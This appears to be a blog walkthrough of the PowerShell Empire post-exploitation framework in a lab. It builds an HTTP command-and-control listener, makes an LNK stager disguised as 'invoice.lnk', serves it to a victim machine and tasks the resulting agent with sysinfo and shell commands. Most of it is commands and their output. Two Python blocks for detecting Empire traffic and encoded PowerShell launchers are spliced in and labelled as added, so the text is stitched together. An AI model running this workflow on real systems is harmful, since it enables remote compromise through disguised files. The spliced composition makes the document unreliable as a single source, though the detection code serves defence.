
More than 5 years have passed since last update.

Using Powershell Empire

Initial setup

Build the C2 server, which Empire calls a listener.

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
http          http_com      http_foreign  http_hop      http_mapi
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://192.168.164.154:80        Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        x,v|hOzsE1+7r.<5YwpjgT2R[6B0inmd Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set BindIP 192.168.164.154
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
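As an added example (not from the article and not part of Empire), the Python below shows what a defender can key on from the listener "info" output above: requests whose path and User-Agent both match the DefaultProfile, and clients that hit those paths at the DefaultDelay of 5 seconds with DefaultJitter 0.0. The proxy log lines are constructed in combined-log format, and the interval thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Defaults copied from the listener "info" output above.
EMPIRE_DEFAULT_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
EMPIRE_DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Constructed sample proxy log (combined-log format with User-Agent), not real traffic.
SAMPLE_LOG = """\
192.168.164.144 - - [21/Apr/2019:11:41:45 +0000] "GET /admin/get.php HTTP/1.1" 200 - "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.168.164.144 - - [21/Apr/2019:11:41:50 +0000] "GET /news.php HTTP/1.1" 200 - "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.168.164.144 - - [21/Apr/2019:11:41:55 +0000] "POST /login/process.php HTTP/1.1" 200 - "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.168.164.144 - - [21/Apr/2019:11:42:00 +0000] "GET /admin/get.php HTTP/1.1" 200 - "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
192.168.164.150 - - [21/Apr/2019:11:41:47 +0000] "GET /index.html HTTP/1.1" 200 - "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/66.0"
192.168.164.150 - - [21/Apr/2019:11:43:12 +0000] "GET /news.php HTTP/1.1" 200 - "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/66.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"$')

def parse_line(line):
    """Return (client, timestamp, method, path, user_agent), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, _status, ua = m.groups()
    return client, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, ua

def profile_hits(log_text):
    """Requests whose path AND User-Agent both match the listener's DefaultProfile defaults."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] in EMPIRE_DEFAULT_URIS and rec[4] == EMPIRE_DEFAULT_UA:
            hits.append((rec[0], rec[2], rec[3]))
    return hits

def beacon_candidates(log_text, expected_delay=5.0, tolerance=0.5, min_requests=3):
    """Clients hitting profile URIs at a fixed interval (DefaultDelay 5 s, DefaultJitter 0.0).
    The thresholds are assumptions for this sample; a real deployment would tune them."""
    times = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] in EMPIRE_DEFAULT_URIS:
            times[rec[0]].append(rec[1])
    out = {}
    for client, ts in times.items():
        ts.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        if len(ts) >= min_requests and all(abs(d - expected_delay) <= tolerance for d in deltas):
            out[client] = median(deltas)
    return out
```

The second client touches /news.php once with a browser User-Agent and is flagged by neither check, which is the point of requiring both the path and the User-Agent, and a regular cadence, before alerting.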

Creating the callback program

Create the callback program, which Empire calls a stager.

(Empire) > usestager
multi/bash                osx/applescript           osx/launcher              osx/teensy                windows/ducky             windows/launcher_vbs      windows/teensy
multi/launcher            osx/application           osx/macho                 windows/backdoorLnkMacro  windows/hta               windows/launcher_xml
multi/macro               osx/ducky                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro
multi/pyinstaller         osx/dylib                 osx/pkg                   windows/csharp_exe        windows/launcher_lnk      windows/macroless_msword
multi/war                 osx/jar                   osx/safari_launcher       windows/dll               windows/launcher_sct      windows/shellcode
(Empire) > usestager windows/launcher_lnk
(Empire: stager/windows/launcher_lnk) > info

Name: LNKLauncher

Description:
  Create a .LNK file that launches the Empire
  stager.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  OutFile          True        clickme.lnk       File to output LNK to.
  LNKComment       False                         LNK Comment.
  Base64           True        True              Switch. Base64 encode the output.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Icon             False       C:\program files\windows nt\accessories\wordpad.exePath to LNK icon.
  PowershellPath   True        C:\windows\system32\WindowsPowershell\v1.0\powershell.exePath to powershell.exe
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/launcher_lnk) > set Listener http
(Empire: stager/windows/launcher_lnk) > set OutFile invoice.lnk
(Empire: stager/windows/launcher_lnk) > execute

[*] Stager output written out to: invoice.lnk
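Added example, not part of the original post or of Empire: a host-side triage helper for the launcher shape the LNK stager invokes (the listener's Launcher option is "powershell -noP -sta -w 1 -enc", run via the PowershellPath shown above). It normalises PowerShell switch spellings from a process-creation command line, decodes the -enc argument (base64 of UTF-16LE text), and alerts when NoProfile, a hidden window and an encoded command occur together. The events, their field names and the encoded script are constructed; the whitespace-only argument split is an assumption.

```python
import base64
# Launcher on this page: "powershell -noP -sta -w 1 -enc"; map switch spellings to one name.
SWITCHES = {
    "-nop": "NoProfile", "-noprofile": "NoProfile", "-sta": "Sta",
    "-w": "WindowStyle", "-windowstyle": "WindowStyle",
    "-enc": "EncodedCommand", "-ec": "EncodedCommand", "-encodedcommand": "EncodedCommand",
}

def encode_ps(script):
    """-EncodedCommand takes base64 of the script as UTF-16LE; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_ps(b64):
    """Recover the script text from a captured -enc argument (None if it is not valid)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    """Return (sorted flag names, decoded script) for one process command line."""
    args = cmdline.split()  # assumption: no quoted paths containing spaces
    exe = args[0].strip('"').lower() if args else ""
    if not exe.endswith(("powershell.exe", "powershell")):
        return [], None
    flags, decoded = set(), None
    for i in range(1, len(args)):
        name = SWITCHES.get(args[i].lower())
        if name is None:
            continue
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if name == "WindowStyle" and nxt.lower() in ("1", "hidden"):
            flags.add("Hidden")
        elif name == "EncodedCommand" and nxt:
            decoded = decode_ps(nxt)
        flags.add(name)
    return sorted(flags), decoded

PS_PATH = "C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe"  # PowershellPath default above
SAMPLE_EVENTS = [  # constructed process-creation events; field names are illustrative, not a real schema
    {"parent": "explorer.exe", "cmdline": f"{PS_PATH} -noP -sta -w 1 -enc " + encode_ps("Write-Output constructed-sample")},
    {"parent": "explorer.exe", "cmdline": f"{PS_PATH} -NoProfile -File C:\\scripts\\backup.ps1"},
]

def triage(event):
    """Alert when NoProfile, a hidden window and an encoded command occur together."""
    flags, decoded = analyze_command_line(event["cmdline"])
    alert = {"NoProfile", "Hidden", "EncodedCommand"} <= set(flags)
    return {"alert": alert, "flags": flags, "decoded": decoded, "parent": event["parent"]}
```

The decoded script is returned alongside the verdict so an analyst sees what the encoded argument actually ran; the benign -NoProfile -File invocation in the second event does not alert.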

Distributing the program

Here we stand up a simple web server, have the target download the stager, and have the target run it.

root@kali:/opt/Empire# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.164.144 - - [21/Apr/2019 11:40:05] "GET / HTTP/1.1" 200 -
192.168.164.144 - - [21/Apr/2019 11:40:07] "GET /invoice.lnk HTTP/1.1" 200 -

Remote control

Once the callback fires and the agent is connected to the C2 server, operate it remotely.

(Empire: stager/windows/launcher_lnk) > [*] Sending POWERSHELL stager (stage 1) to 192.168.164.144
[*] New agent K2FYZV6W checked in
[+] Initial agent K2FYZV6W from 192.168.164.144 now active (Slack)
[*] Sending agent (stage 2) to K2FYZV6W at 192.168.164.144

(Empire: stager/windows/launcher_lnk) > back
(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 K2FYZV6W ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:41:45

(Empire: agents) > rename K2FYZV6W target01
(Empire: agents) > list

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 target01 ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:42:10

(Empire: agents) > interact target01
(Empire: target01) > sysinfo
[*] Tasked K2FYZV6W to run TASK_SYSINFO
[*] Agent K2FYZV6W tasked with task ID 1
(Empire: target01) > sysinfo: 0|http://192.168.164.154:80|DESKTOP-1SS146L|marseille|DESKTOP-1SS146L|192.168.164.144|Microsoft Windows 10 Pro|False|powershell|592|powershell|5
[*] Agent K2FYZV6W returned results.
Listener:         http://192.168.164.154:80
Internal IP:    192.168.164.144
Username:         DESKTOP-1SS146L\marseille
Hostname:       DESKTOP-1SS146L
OS:               Microsoft Windows 10 Pro
High Integrity:   0
Process Name:     powershell
Process ID:       592
Language:         powershell
Language Version: 5

[*] Valid results returned by 192.168.164.144

(Empire: target01) > hostname
[*] Tasked K2FYZV6W to run TASK_SHELL
[*] Agent K2FYZV6W tasked with task ID 2
(Empire: target01) > [*] Agent K2FYZV6W returned results.
HostName        Aliases AddressList
--------        ------- -----------
DESKTOP-1SS146L {}      {192.168.164.144}
[*] Valid results returned by 192.168.164.144